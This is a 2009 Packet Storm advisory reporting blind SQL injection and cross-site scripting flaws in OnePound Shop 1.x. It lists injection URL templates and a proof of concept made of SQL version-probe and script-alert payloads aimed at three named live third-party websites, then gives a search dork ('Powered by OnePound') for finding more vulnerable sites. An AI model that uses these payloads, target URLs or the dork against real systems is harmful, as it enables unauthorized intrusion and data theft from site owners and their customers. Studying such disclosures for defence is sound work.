OnePound Shop 1.x SQL Injection / XSS

2009-07-17T00:00:00
ID PACKETSTORM:79319
Type packetstorm
Reporter NoGe
Modified 2009-07-17T00:00:00

Description

                                        
                                            `  
================================================================================================  
  
  
[o] OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vulnerability  
  
Software : OnePound Shop version 1.x  
Vendor : http://www.onepound.cn/  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
================================================================================================  
  
  
[o] Vulnerable file  
  
productsview.php  
categories.php  
  
  
  
[o] Exploit  
  
http://localhost/[path]/productsview.php?id=xx&proid=[SQL]  
http://localhost/[path]/categories.php?pid=[XSS]  
  
  
  
[o] Proof of concept  
  
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=5  
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=4  
http://www.tele-way.com/productsview.php?id=87&proid=<script>alert(1210)</script>  
http://tonysbridal.net/categories.php?pid=<script>alert(1210)</script>  
http://vendorhotspot.com/categories.php?pid=<script>alert(1210)</script>  
  
  
  
[o] Dork  
  
"Powered by OnePound"  
  
  
================================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org/news ]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang  
H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
  
================================================================================================  
`